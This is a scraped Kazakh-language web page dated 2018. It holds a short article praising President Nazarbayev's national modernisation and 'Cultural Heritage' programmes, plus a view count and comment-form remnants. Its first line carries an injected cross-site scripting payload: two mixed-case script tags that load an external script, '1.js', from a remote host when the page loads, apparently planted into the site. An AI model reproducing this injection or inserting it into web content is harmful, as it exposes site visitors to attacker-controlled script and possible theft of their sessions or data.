<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.02.2018

«Әлемдік жаңғыру» аясында елімізді және оның жүрегі - Астананы дамыту мен өркендету Елбасымыздың жіті қадағалауында тұрғанын жақсы білеміз. Сондықтан Қазақстанның әрбір азаматы, әрбір мемлекеттік қызметкері осы елдік жауапкершілікті терең сезініп, ел мәдениетінің одан әрі жетілуіне аянбай үлес қосуы қажет деп санаймыз. Еліміздің даму басымдықтарын нақты айқындап берген Президент Н.Ә.Назарбаев өңірлік және әлемдік экономикалық дағдарыс өршіп тұрған кезеңде халықты азық-түлікпен қамтамасыз ету, жұмыспен қамту, елдің әл-ауқатын түзеу, халықаралық беделін арттыру міндеттерімен қатар болашақтың кепілі ретінде тарихымызды танып-білу мен зерделеу, оларды Тәуелсіздік құндылықтарымен сабақтастықта қарау қажеттігіне айрықша көңіл бөлді. Бұл отаншылдық үдерістерге серпін беріп, тарихы терең Қазақстан Республикасын және өзімізді құр­мет­теуге жол ашты. Еңсеміз кө­теріліп, ха­лықтық қалпымыздың сапасы артты. Нұрсұлтан Әбішұлының бастама­сымен өмірге келген «Мәдени мұ­ра» бағдарламасы кең байтақ елі­міз­дің қойнауында зерттелмеген, ұмы­тылған ғажайып археология жәді­герліктерін табудың, халықтың бай рухани құндылықтарын зерделеудің, мұраны зерттеудің жаңа жүйесін қалыптастырудың, табиғи-мәдени және сәулет ескерткіштерін қалпына келтірудің, дүниежүзілік ғылым, мәдениет, әдебиет жетістігіне негіз­делген гуманитарлық ғылымның то­лыққанды қорын құрудың негізіне айналды.

Просмотров: 602


Пікір қосу



Деректерді қолтаңбаға қосу